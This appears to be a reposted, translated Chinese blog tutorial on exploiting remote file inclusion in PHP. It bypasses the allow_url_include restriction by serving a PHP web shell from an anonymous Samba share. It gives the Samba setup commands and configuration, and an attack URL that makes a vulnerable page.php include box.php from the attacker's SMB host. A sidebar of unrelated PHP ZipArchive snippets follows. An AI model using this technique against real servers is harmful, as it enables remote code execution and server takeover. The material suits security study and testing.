http 直接显示目录下文件_利用PHP应用程序中的远程文件包含(RFI)并绕过远程URL包含限制...

最新推荐文章于 2024-08-14 16:54:47 发布
最新推荐文章于 2024-08-14 16:54:47 发布
阅读量106 收藏
点赞数
文章标签: http 直接显示目录下文件 在 classpath 中包含那些 jar 文件 用fopen在机器根目录下创建文件

83a3889ba84a62f06d6e6cab3292fc94.png

在这篇博客文章中,我将演示在PHP应用程序中利用远程文件包含(RFI)漏洞的技术,该漏洞容易受到“文件包含攻击”的影响。我们将绕过远程URL包含限制,并执行RFI的开发,即使PHP环境配置为不包含来自远程HTTP/FTP URL的文件。

PHP和SMB共享文件访问

在PHP配置文件中,“allow_url_include”包装器默认设置为“Off”,表示PHP不加载远程HTTP或FTP URL,从而防止远程文件包含攻击。但是,即使“allow_url_include”和“allow_url_fopen”都设置为“Off”,PHP也不会阻止SMB URL加载。PHP的这种行为可以被滥用来从SMB共享加载远程托管的PHP web shell。

攻击场景

当易受攻击的PHP应用程序代码尝试从受攻击者控制的SMB共享加载PHP web shell时,SMB共享应该允许访问该文件。攻击者需要将SMB服务器配置为启用匿名浏览访问。因此,一旦易受攻击的应用程序尝试从SMB共享访问PHP web shell,SMB服务器将不会要求任何凭据,易受攻击的应用程序将包含web shell的PHP代码。

让我们开始吧,首先我重新配置了PHP环境,并在php.ini文件中禁用“allow_url_fopen”以及“allow_url_include”。然后配置SMB服务器具有匿名读访问权限。一旦SMB共享准备就绪,就可以利用易受攻击的应用程序。

PHP环境设置

在其上托管易受攻击代码的机器将“allow_url_fopen”和“allow_url_include”设置为“Off”。

PHP版本“5.5.11”的当前配置的屏幕截图:

c6220865be59502bf1fae19b3e7cb507.png

在继续之前,首先确保当我们尝试访问HTTP上托管的Web shell时,PHP代码不允许远程文件包含。

7642d500e396109848a6f7e00cd89f82.png

当我试图从远程主机包含PHP Web shell时,应用程序抛出错误,RFI没有发生。

使用匿名读取访问权限配置SAMBA服务器(Linux计算机)

使用下面提到的命令安装SAMBA服务器:

apt-get install samba

创建SMB共享目录(在本文中是/var/www/html/pub/)

mkdir /var/www/html/pub/

a8cfacb446686018c6eb0755217ae640.png

在新创建的SMB共享目录上配置权限:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

ca168d55109ecb68c6816c65e323be34.png

运行以下命令删除SAMBA服务器配置文件的默认内容

echo > /etc/samba/smb.conf

将下面的内容放入“/etc/samba/smb.conf”文件中 

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

现在,重启SAMBA服务器以应用配置文件/etc/samba/smb.conf中的新配置 

service smbd restart

成功重启SAMBA服务器后,尝试访问SMB共享,并确保SAMBA服务器不要求凭据。

在本文中,SAMBA服务器IP是192.168.0.3,我需要访问Windows文件资源管理器中的SMB共享, 如下所述:

192.168.0.3

96f0880300dea78ff315401254accdd8.png

在SMB共享中托管PHP Web shell

很好,SMB共享是可访问的,并显示目录“ica”是存在的。

现在,在目录“/var/www/html/pub”中托管PHP shell,这是SMB共享“ica”的目录。

5ec2562baaada79c3d8245e4df902845.png

一旦我们在目录“/var/www/html/pub”中有了PHP shell,就可以使用Windows文件资源管理器访问SMB共享目录'ica'。

192.168.0.3ica

您将看到PHP shell存在是SMB共享目录。在本文中,它是box.php

c81c2b1b637ed5fcaad4b39b281b2c49.png

攻击文件包含易受攻击的参数

完美,让我们使用这个PHP shell SMB链接,并使用易受攻击的PHP代码浏览它。

http://vulnerable_application/page.php?page=192.168.0.3icabox.php

当当!易受攻击的PHP代码从SMB共享中获取Web shell,并在应用程序服务器上执行代码。我们已经绕过了限制,并包含了托管在远程主机上的Web shell。

08dc7ab87a692ef81578d5f07c3c5e30.png

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

weixin_39607873
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Remote & Local File Inclusion (RFI/LFI)-文件包含漏洞
seanyang_的博客
10-26 348
文件包含攻击,是指攻击者利用文件包含函数的参数引入文件,而Web应用又没有对该参数进行严格的过滤,导致引入文件的恶意脚本或代码被解析、执行,攻击者获取服务器信息,甚至获取服务器权限。在PHP开发的Web应用,脚本、图片、文本文档等被文件包含后,都会作为PHP脚本来解析。
kali获取网站php文件,Kali Linux系统利用DVWA靶场进测试文件包含漏洞:
weixin_35158372的博客
03-18 627
文件包含漏洞:当服务器开启allow_url_include选项时,就可以通过php的某些特性include(),require(),include_once(),require_once()利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行,文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启php配置的allow_ur...
php ziparchive setpassword 不生效_PHP实现下载与压缩文件的方法的封装与整理
weixin_39669133的博客
12-21 585
一、PHP实现打包zip并下载功能$file_template = FCPATH.'canddata/cand_picture.zip';//在此之前你的项目目录必须新建一个空的zip包(必须存在)$downname = $card.'.zip';//你即将打包的zip文件名称$file_name = FCPATH.'canddata/'.$card.'.zip';//把你打包后zip所存放的目...
php zip password,php ZipArchive setPassword is not work
weixin_42366095的博客
03-28 377
$zip = new ZipArchive();$code = $zip->open('myzip.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);if ($code === true)echo 'zip opened';elseecho $code.'';$zip->addFile('somefile');$code = $zip-...
php ZipArchive 压缩文件夹,并设置密码
廖圣平
10-30 520
【代码】php压缩文件夹,并设置密码。
PHP使用ZipArchive创建带密码保护的压缩包
最新发布
hbh112233abc的博客
08-14 420
可是如果真的那样操作,发现用压缩软件打开后并不需要密码验证,可以直接解压读取文件内容的.关于PHP使用ZipArchive创建带密码保护的压缩包的示例,好多只提到。,生成的压缩包test2.txt将不受密码保护,可以直接读取其内容。对需要加密的文件还是需要使用。进行设置,包括ai助手也是。对test2.txt未设置。进行设置后才有效果的.
使用PHP自带的ZipArchive的一些问题
tongluren381的博客
05-11 2456
1.添加文件到压缩文件文件太大或者太小添加失败问题。 2.文件路径有文或特殊字符时不能使用$zip->addFile($file,basename($file)); 我的例子: <?php $rootPath = $_SERVER['DOCUMENT_ROOT'];//网站根目录 $files[] = "C:\Users\Administrator\Pictures\a9290e3daadbf937e77f09f9eaa8aa40.jpg";//必须绝对路径,为什么有些图..
文件包含漏洞-02】文件包含漏洞分类与原理及其空字符安全绕过实验
cc
02-22 3071
文件包含(file inclusion)漏洞,当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。本地文件包含LFI(local file inclusion):当被包含文件在服务器本地时,可以通过文件路径(相对或绝对)加载(读取和打开)文件,就形成本地文件包含
文件包含漏洞
qq_56289291的博客
07-27 1252
文件包含漏洞可以分为和两种。而区分二者最简单的办法就是通过查看php.ini是否开启了allow_url_include。如果开启就有可能包含远程文件远程文件包含需要php.iniallow_url_fopen=On(是否允许打开远程文件)allow_url_include=On(是否允许include/require远程文件)。在php.ini,allow_url_fopen默认一直是On,而从php5.2之后就默认为allow_url_includ为Off。...
DVWA之PHP文件包含漏洞(File Inclusion)
热门推荐
Mi1k7ea
03-08 1万+
文件包含漏洞,简单地说,就是在通过函数包含文件时,由于没有对包含文件名进行有效的过滤处理,被攻击者利用从而导致了包含了Web根目录以外的文件进来,就会导致文件信息的泄露甚至注入了恶意代码。更多的介绍这里就不多说了,直接上正题~ 文件包含漏洞的一般特征如下: ?page=a.php ?home=a.html ?file=content 目录遍历(Directory
ziparchive php error,关于问题php使用ZipArchive提示Fatal error: Class ZipArchive not found&nb...
weixin_30953869的博客
03-12 130
执行时发现Fatal error: Class 'ZipArchive' not found in E:wwwqqdown.php online 63看这个不是未定义了,所以小编百度搜索一下,如下如下解说在Windows下的解决办法是:1、在php.ini文件,将extension=php_zip.dll前面的分号“;”去除;重启Apache服务器,我们再试发现可以了补充如果是统参考下面方法在L...
新电脑或新安装php套件时出现这个错误说明是程序在调用‘ZipArchive‘ 这个类的时候没有成功
ilwtfqqc的博客
03-08 274
Fatal error: Class 'ZipArchive' not found in 在新电脑或新安装php套件时出现这个错误说明是程序在调用'ZipArchive' 这个类的时候没有成功,原因是由于在安装php的时候没有增加php zip的支持(非zlib)。 在Windows下的解决办法是: 1、在php.ini文件,将extension=php_zip.dll前面的分号“;”去除; (如果没有,请添加extension=php_zip.dll此行并确保php_zip.dll文...
PHP批量下载远程文件并zip压缩打包下载
jeesr的博客
07-27 598
【代码】PHP批量下载远程文件并zip压缩打包下载。
PHP文件压缩并下载
wendyNo的博客
08-31 350
public function downloadZip(){ $id = input('id'); //获取所有的材料 $data = DB::table('stuff_teengerapply')->field('file_url')->where(array('sid'=>$id))->select(); //创建压缩文件的地址 $zipName = ROOT_PATH.'public/upload'.t...
php加密压缩文件
aiyitang1489的博客
09-07 1180
前言 近几日,用爬虫采集的了一些数据,存放到硬盘,随着数据量越来越多,所以想上传到网盘当,可是不加下密又觉得不放心, 所以开始用PHP的zip模块进行压缩加密. 开始 $zipArc = new \ZipArchive(); if ($zipArc->open('/home/test.zip', ZipArchive::CREATE | ZipArchive::OVERW...
解决php ZipArchive执行后无法生成zip文件的问题
步满生错的专栏
03-11 1万+
以前写过一个zip压缩的东东,当时zip包用的是随机名,所以一路顺畅。但是今天下午遇到一个抓狂的问题就是zip程序执行之后没发现生成zip文件,代码并没有报错,折腾半天原来是系统编码问题。 目前一般php都是utf8下写的,但是文win下的ANSI用的是GBK编码,所以还得转GBK。 为了让测试机和服务器都顺畅的执行所以有以下示例代码: $fileName="文名的zip哟";
Php使用ZipArchive打包下载文件、图片
工作中学习,学习中进步
10-17 748
PHP ZipArchive 是PHP自带的扩展类,可以轻松实现ZIP文件的压缩和解压,使用前首先要确保PHP ZIP 扩展已经开启。
Web安全:远程文件包含(RFI)攻击详解与防范
远程文件包含(Remote File Inclusion,RFI)是一种常见的Web应用安全漏洞,它允许攻击者通过将远程URL作为参数传递给`include`或`require`等函数,使得Web应用程序执行非预期的远程文件。这种攻击方式可能导致敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值